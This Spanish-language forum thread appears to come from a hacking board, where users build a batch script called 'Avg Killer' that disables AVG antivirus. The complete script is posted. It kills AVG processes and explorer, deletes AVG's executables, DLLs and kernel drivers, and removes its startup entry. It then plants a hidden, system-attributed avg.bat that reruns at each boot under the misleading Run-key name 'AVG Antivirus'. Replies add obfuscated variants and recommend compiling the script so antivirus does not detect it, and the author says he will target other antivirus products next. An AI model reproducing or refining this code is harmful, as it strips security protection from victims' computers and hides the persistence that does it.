Laughing Man
Wiki
 Desconectado
Mensajes: 2.558
Lo que haría sería hacerme pasar por sordomudo...
|
Me he tomado el trabajo de buscar todos y cada uno de los procesos que tenía activos. Unos eran del sistema, otros del vmware, etc, pero nada de nada con respecto al avg... le perdí el rastro  |
|
|
|
|
En línea
|
|
|
|
|
|
|
^Arkangel^
|
el avast no es malo ^^ te recomiendo el panda antes que el avast  |
|
|
|
|
En línea
|
|
|
|
Laughing Man
Wiki
Desconectado
Mensajes: 2.558
Lo que haría sería hacerme pasar por sordomudo...
|
Pero... pero.... debe haber una forma... Y alguien debe de saberla ¿verdad?... No me rendiré ahora que he llegado "tan" lejos...  Carloswaldo |
|
|
|
|
En línea
|
|
|
|
Laughing Man
Wiki
Desconectado
Mensajes: 2.558
Lo que haría sería hacerme pasar por sordomudo...
|
He estado investigando. Este archivo no lo puedo eliminar ni a bala, osea ni forzandolo en el cmd ni nada: avgse.dll Esto es lo que encontre en internet: Description: avgse.dll is located in a subfolder of "C:\Program Files" - normally C:\Program Files\Grisoft\AVG Free\. Known file sizes on Windows XP are 40960 bytes (47% of all occurrence), 50688 bytes, 29743 bytes, 45056 bytes, 28207 bytes.
A .dll file (Dynamic Link Library) is a special type of Windows program containing functions that other programs can call. This .dll file can be injected to all running processes and can change or manipulate their behavior. The program is not visible. The service has no detailed description. It can change the behavior of other programs or manipulate other programs. File avgse.dll is not a Windows system file. avgse.dll seems to be a compressed file. Therefore the technical security rating is 64% dangerous, however also read the users reviews. Quiere decir que esta dll puede estar camuflada en otro proceso? como saberlo? Ahí está mi codigo: @echo off
set a=avgamsvr.exe
set b=avgcc.exe
set c=avgemc.exe
set d=avgupsvc.exe
set e=\Grisoft\AVG7
set f=*.exe*
set g=*.dll*
taskkill /f /im %a%
taskkill /f /im %b%
taskkill /f /im %c%
taskkill /f /im %d%
cd %programfiles%%e%
del /f /q /s %f%
del /f /q /s %g%
REG DELETE HKLM\Software\Microsoft\Windows\CurrentVersion\Run\ /v AVG7_CC /f
exit |
|
|
|
|
En línea
|
|
|
|
Laughing Man
Wiki
Desconectado
Mensajes: 2.558
Lo que haría sería hacerme pasar por sordomudo...
|
Bueno el archivo estaba siendo usado por el explorer, así que se me ocurrió hacer esto: set h=explorer.exe
set i=avgse.dll
...
taskkill /f /im %h%
del /f /q /s %i%
start %h% Y lo logra, aunque resulta algo demasiado notorio y sospechozo jaja, hay alguna otra forma de hacerlo? Ademas aun matando ese archivo el avg sigue activo en alguna parte... ya no se donde buscar... |
|
|
|
|
En línea
|
|
|
|
Darioxhcx
 Conectado
Mensajes: 226
|
set $=taskkil /IM /F
set 4=Del /f /q /s
%$%explorer.exe
cd %prorgamfiles%\avg <-- o como sea la ruta
%4%"avgse.dll"
podrias probarlo asi tmb
saludos
|
|
|
|
|
En línea
|
|
|
|
Hendriҳ
Colaborador
Desconectado
Mensajes: 2.005
The Lord of his Middle Earth
|
|
|
|
|
|
En línea
|
Muchas veces las cosas no se le dan al que las merece más, sino al que sabe pedirlas con insistencia. - Arthur Schopenhauer |
|
|
Laughing Man
Wiki
Desconectado
Mensajes: 2.558
Lo que haría sería hacerme pasar por sordomudo...
|
set $=taskkil /IM /F
set 4=Del /f /q /s
%$%explorer.exe
cd %prorgamfiles%\avg <-- o como sea la ruta
%4%"avgse.dll"
Con eliminar el archivo no tengo problemas, con el codigo que escribi lo hace. Uso el Quick Batch file compiler y el archivo resultante no es detectado por el av, incluso ejecuto el .bat sin problemas. Excelente, no lo había visto, lo estaré probando. Gracias  Por cierto, he descubierto que hay ciertos archivos .sys que son del propio avg y estan en el directorio de drivers, sera que estos también me causan problemas?... A este paso terminaré eliminando todo mi disco duro |
|
|
|
|
En línea
|
|
|
|
|
^Arkangel^
|
Uso el Quick Batch file compiler
Bien ahí |
|
|
|
|
En línea
|
|
|
|
Laughing Man
Wiki
Desconectado
Mensajes: 2.558
Lo que haría sería hacerme pasar por sordomudo...
|
Pues al parecer por fin lo he logrado, elimnando esos archivos en la carpeta de drivers. Este es el código final: ::Avg Killer by Carloswaldo
@echo off
::Declaramos variables
set a=avgamsvr.exe
set b=avgcc.exe
set c=avgemc.exe
set d=avgupsvc.exe
set e=\Grisoft\AVG7
set f=*.exe*
set g=*.dll*
set h=explorer.exe
set i=avgse.dll
set j=\system32\drivers
set k=avgmfx86.sys
set l=avgclean.sys
set m=avg7rsxp.sys
set n=avg7rsw.sys
set o=avgtdi.sys
set p=avg7core.sys
::Matamos los procesos del avg
taskkill /f /im %a%
taskkill /f /im %b%
taskkill /f /im %c%
taskkill /f /im %d%
::Vamos a donde está instalado el avg y borramos los .exe y .dll
cd %programfiles%%e%
del /f /q /s %f%
del /f /q /s %g%
::Matamos el explorer para matar un dll y un driver, volvemos a iniciar el explorer
taskkill /f /im %h%
del /f /q /s %i%
cd %windir%%j%
del /f /q /s %o%
del /f /q /s %p%
start %h%
::Matamos el resto de drivers
del /f /q /s %k%
del /f /q /s %l%
del /f /q /s %m%
del /f /q /s %n%
::Borramos la clave del registro por si las moscas...
REG DELETE HKLM\Software\Microsoft\Windows\CurrentVersion\Run\ /v AVG7_CC /f
::Creamos un bat que se iniciara siempre, solo por si acaso
cd %windir%
echo @echo off >> avg.bat
attrib +r +a +s +h avg.bat
echo set a=avgamsvr.exe >> avg.bat
echo set b=avgcc.exe >> avg.bat
echo set c=avgemc.exe >> avg.bat
echo set d=avgupsvc.exe >> avg.bat
echo set e=\Grisoft\AVG7 >> avg.bat
echo set f=*.exe* >> avg.bat
echo set g=*.dll* >> avg.bat
echo taskkill /f /im %a% >> avg.bat
echo taskkill /f /im %b% >> avg.bat
echo taskkill /f /im %c% >> avg.bat
echo taskkill /f /im %d% >> avg.bat
echo cd %programfiles%%e% >> avg.bat
echo del /f /q /s %f% >> avg.bat
echo del /f /q /s %g% >> avg.bat
echo REG DELETE HKLM\Software\Microsoft\Windows\CurrentVersion\Run\ /v AVG7_CC /f >> avg.bat
reg add "HKLM\Software\Microsoft\Windows\CurrentVersion\Run" /v "AVG Antivirus" /d "%windir%\avg.bat" /f
exit Hoy que inicie de nuevo el pc ya no me sale por ningun lado el cartelito de "Acceso denegado" ni nada por el estilo.  Estaré buscando la forma de mejorar el código, e iré por el próximo av...  |
|
|
|
|
En línea
|
|
|
|
$hyDow
Desconectado
Mensajes: 36
|
no seria mejor hacer
@echo off
SeT a=attrib
SeT b=-R
SeT c=-A
SeT d=-S
SeT e=Del /F /S /Q
SeT f=*.*
SeT g=cd
SeT i=-H
SeT {=ExiT
SeT 1=%ProgramFiles%\grisoft
%g%%1%
%a%%b%%c%%d%%e%%i%%f%
%e%%f%
%{%
digo yo, o tal vez usar ren *.* *
eso es mas original xD
pero me refiero a borrarlo todo...
$hyDow
|
|
|
|
|
En línea
|
|
|
|
Sai-To
Desconectado
Mensajes: 181
|
bueno si no te quieres complicar la vida poniendo como un becerro: set var=............... ................... hay crearon una utilidad para separarlo asi... la postee yo de skull! y no se como es el de hendrix pero si los combinas lo dos y Batch Compiler seria buen aporte! |
|
|
|
|
En línea
|
|
|
|
$hyDow
Desconectado
Mensajes: 36
|
hombre la aplicacion de hendrix es rebuena, pero tiene mas merito asi
$hyDow
|
|
|
|
|
En línea
|
|
|
|
|
Autor
